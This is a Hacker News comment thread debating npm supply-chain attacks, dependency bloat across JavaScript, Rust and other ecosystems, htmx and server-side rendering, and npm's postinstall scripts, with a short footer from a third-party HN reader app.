Even worse, now you have to check for security flaws in that JS that's been written by node_modules importers.
That or there could someone could write a standard library for JS?
Some of us are fortunate to have never left vanilla JS.
Of course that limits my job search options, but I can't feel comfortable signing off on any project that includes more dependencies than I can count at a glance.
C#, Java, and so on.
Is the difference between the number of dev dependencies for eg. VueJs (a JavaScript library for marshalling Json Ajax responses into UI) and Htmx (a JavaScript library for marshalling html Ajax responses into UI) meaningful?
There is a difference, but it's not an order of magnitude and neither is a true island.
Granted, deciding not to use JS on the server is reasonable in the context of this article, but for the client htmx is as much a js lib with (dev) dependencies as any other.
https://github.com/bigskysoftware/htmx/blob/master/package.j...
Except that htmx's recommended usage is as a single <script> injected directly into your HTML page, not as an npm dependency. So unless you are an htmx contributor you are not going to be installing the dev dependencies.
That script still gets built somewhere using those deps
AFAICT, the only thing this attack relies on, is the lack of scrutiny by developers when adding new dependencies.
Unless this lack of scrutiny is exclusive to JavaScript ecosystem, then this attack could just as well have happened in Rust or Golang.
I don't know Go, but Rust absolutely has the same problem, yes. So does Python. NPM is being discussed here, because it is the topic of the article, but the issue is the ease with which you can pull in unvetted dependencies.
Languages without package managers have a lot more friction to pull in dependencies. You usually rely on the operating system and its package-manager-humans to provide your dependencies; or on primitive OSes like Windows or macOS, you package the dependencies with your application, which involves integrating them into your build and distribution systems. Both of those involve a lot of manual, human effort, which reduces the total number of dependencies (attack points), and makes supply-chain issues like this more likely to be noticed.
The language package managers make it trivial to pull in dozens or hundreds of dependencies, straight from some random source code repository. Your dependencies can add their own dependencies, without you ever knowing. When you have dozens or hundreds of unvetted dependencies, it becomes trivial for an attacker to inject code they control into just one of those dependencies, and then it's game over for every project that includes that one dependency anywhere in their chain.
It's not impossible to do that in the OS-provided or self-managed dependency scenario, but it's much more difficult and will have a much narrower impact.
If you try installing npm itself on debian, you would think you are downloading some desktop environment. So many little packages.
There is little point in you scrutinizing new dependencies.
Many who claim to fully analyze all dependencies are probably lying. I did not see anyone in the comments sharing their actual dependency count.
Even if you depend only on Jest - Meta's popular test runner - you add 300 packages.
Unless your setup is truly minimalistic, you probably have hundreds of dependencies already, which makes obsessing over some more rather pointless.
At least in the JS world there are more people (often also more inexperienced people) who will add a dependency willy-nilly. This is due to many people starting out with JS these days.
JavaScript does have some pretty insane dependency trees. Most other languages don’t have anywhere near that level of nestedness.
Don't they?
I just went to crates.io and picked a random newly updated crate, which happened to be pixelfix, which fixes transparent pixels in pngs.
It has six dependencies and hundreds of transient dependencies, may of which appear to be small and highly specific a la left-pad.
https://crates.io/crates/pixelfix/0.1.1/dependencies
Maybe this package isn't representative, but it feels pretty identical to the JS ecosystem.
It depends on `image` which in turn depends on a number of crates to handle different file types. If you disable all `image` features, it only has like 5 dependencies left.
And all those 5 remaining dependencies have lots of dependencies of their own. What's your point?
> What's your point?
Just defending Rust.
> 5 remaining dependencies have lots of dependencies of their own.
Mostly well-known crates like rayon, crossbeam, tracing, etc.
You cannot defend Rust if this is reality.
Any Rust project I have ever compiled pulled in over 1000 dependencies. Recently it was Zed with its >2000 dependencies.
I think it's justified for Zed. It does a lot of things.
Zed isn’t special, I doubt Sublime Text has thousands of dependencies. It’s a language/culture problem.
Edit: Ghostty is a good counter-example that is open source. https://github.com/ghostty-org/ghostty/tree/main/pkg
Zed is closer to IntelliJ or VSCode than to Sublime Text.
In the amount of bloat, yes.
It is also important to note that this is not specific to Zed. As someone else have mentioned, it is a cultural problem. I picked Zed as an example because that is what I compiled the last time, but it is definitely not limited to Zed. There are many Rust projects that pull in over 1000 dependencies and they do much less than Zed.
It's not possible for a language to have an insane dependency tree. That's an attribute of a codebase.
Modern programming languages don't exist in a vacuum, they are tied to the existing codebase and libraries.
Sort of, but I don't really buy this argument. Someone could go and write the "missing JS stdlib" library that has no dependencies of its own. They could adopt release policies that reduce the risk of successful supply chain attacks. Other people could depend on it and not suffer deep dependency trees.
JS library authors in general could decide to write their own (or carefully copy-paste from libraries) utility functions for things rather than depend on a huge mess of packages. This isn't always a great path; obviously reinventing the wheel can come with its own problems.
So yes, I'd agree that the ecosystem encourages JS/TS developers to make use of the existing set of libraries and packages with deep dependency trees, but no one is holding a gun to anyone's head. There are other ways to do it.
Whatever you're trying to say, you aren't.
C library is smaller than Node.js (you won’t have HTTP). What C have is much more respectable libraries. If you add libcurl or freetype to your project, it won’t pull the whole jungle with them.
What C doesn't have is an agreed-upon standard package manager. Which means that any dependency - including transitive ones! - requires some effort on behalf of the developer to add to the build. And that, in turn, puts pressure on library authors to avoid dependencies other than a few well-established libraries (like libpng or GLib),
You can add curl to a Rust project too.
Because it requires using async, and for most programs async is not worth the extra effort (plus very heavy dependency in the form of Tokio).
It requires Tokio, and believe it or not there are actual cases for non-async rust. So you can't use it in that case.
It's bloated.
This makes little sense. Any popular language with a lax package management culture will have the exact same issue, this has nothing to do with JS itself. I'm actually doing JS quasi exclusively these days, but with a completely different tool chain, and feel totally unconcerned by any of these bi-weekly NPM scandals.
Rust is working on that. It's not far behind right now, leave it a couple of years.
That, and the ability to push an update without human interaction.
The blast radius is made far worse by npm having the concept of "postinstall" which allows any package the ability to run a command on the host system after it was installed.
This works for deps of deps as well, so anything in your node_modules has access to this hook.
It's a terrible idea and something that ought to be removed or replaced by something much safer.
I agree in principle, but child_process is a thing so I don't think it makes much difference. You are pwned either way if the package can ever execute code.
Simply avoiding Javascript won't cut it.
While npm is a huge and easy target, the general problem exists for all package repositories. Hopefully a supply chain attack mitigation strategy can be better than hoping attackers target package repositories you aren't using.
While there's a culture prevalent in Javascript development to ignore the costs of piling abstractions on top of abstractions, you don't have to buy into it. Probably the easiest thing to do is count transitive dependencies.
> Simply avoiding Javascript won't cut it.
But it will cut a large portion of it.
Javascript is badly over-used and over-depended on. So many websites just display text and images, but have extremely heavy javascript libraries because that's what people know and that is part of the default, and because it enables all the tracking that powers the modern web. There's no benefit to the user, and we'd be better off without these sites existing if there were really no other choice but to use javascript.
NPM does seem vastly over represented in these type of compromises, but I don't necessarily think that e.g. pypi is much better in terms of security. So you could very well be correct that NPM is just a nicer, perhaps bigger, target.
If you can sneak malware into a JavaScript application that runs in millions of browsers, that's a lot more useful that getting a some number servers running a module as part of a script, who's environment is a bit unknown.
Javascript really could do with a standard library.
> So many websites just display text and images
Eh... This over-generalises a bit. That can be said of anything really, including native desktop applications.
Is that true? The things people use native desktop applications for nowadays tend to be exactly those which aren't just neat content displays. Spreadsheets, terminals, text-editors, CAD software, compilers, video games, photo-editing software. The only things I can think of that I use as just text/image displays are the file-explorer and image/media-viewer apps, of which there are really only a handful on any given OS.
You could argue that spreadsheets and terminals are just text with extra features! I'm joking though, but web apps usually are more than just text and images too.
Rendering template partials server-side and fetching/loading content updates with HTMX in the browser seems like the best of all worlds at this point.
Until you need to write JavaScript?
Then write it. Javascript itself isn't the problem, naive third-party dependencies are.
Which should be much less than what’s customary?
Until you have to.
The only way to win is not to play.
Let me quit my job real quick. The endgame is probably becoming a monk, no kidding.
I considered becoming a Zen monk, but then I gave up the desire.
> These attacks may just be the final push I needed to take server rendering (without js) more seriously
Have fun, seems like a misguided reason to do that though.
A. A package hosted somewhere using a language was compromised!
B. I am not going to program in the language anymore!
I don't see how B follows A.
Why is this inevitable? If you use only easily verifyable packages you’ve lost nothing. The whole concept of npm automatically executing postinstall scripts was fixed when my pnpm started asking me every time a new package wanted to do that.
> The HTMX folks convinced me that I can get REALLY far without any JavaScript
HTMX is JavaScript.
Unless you meant your own JavaScript.
When we say 'htmx allows us to avoid JavaScript', we mean two things: (1) we typically don't need to rely on the npm ecosystem, because we need very few (if any) third-party JavaScript libraries; and (2) htmx and HTML-first allow us to avoid writing a lot of custom JavaScript that we would have otherwise written.
HTMX is full of JavaScript. Server-side-rendering without JavaScript is just back to the stuff Perl and PHP give you.
I don't think the point is to avoid Javascript, but to avoid depending on a random number of third-parties.
> Server-side-rendering without JavaScript is just back to the stuff Perl and PHP give you.
As well as Ruby, Python, Go, etc.
HTMX does not have external dependencies, only dev dependencies, reducing the attack surface.
Do you count LiveView (Elixir) in that assessment?
This is going to become an issue for a lot of managers, not just npm. Npm is clearly a very viable target right now, though. They're going to get more and more sophisticated.
Took that route myself and I don't regret it. Now I can at least entirely avoid Node.js ecosystem.
Not for the frontend. esm modules work great nowadays with import maps.
> supply chain attacks
You all really need to stop using this term when it comes to OSS. Supply chain implies a relationship, none of these companies or developers have a relationship with the creators other than including their packages.
Call it something like "free code attacks" or "hobbyist code attacks."
“code I picked up off the side of the road”
“code I somehow took a dependency on when copying bits of someone’s package.json file”
“code which showed up in my lock file and I still don’t know how it got there”
All of which is true for far too many projects
I know CrowdStrike have a pretty bad reputation but calling them hobbyists is a bit rude.
I'm sure no offense was intended to hobbyists, but it was indeed rude
A supply chain can have hobbyists, there's no particular definition that says everyone involved must be a professional registered business.
This project is an enhanced reader for Ycombinator Hacker News: https://news.ycombinator.com/.
The interface also allow to comment, post and interact with the original HN platform. Credentials are stored locally and are never sent to any server, you can check the source code here: https://github.com/GabrielePicco/hacker-news-rich.
For suggestions and features requests you can write me here: gabrielepicco.github.io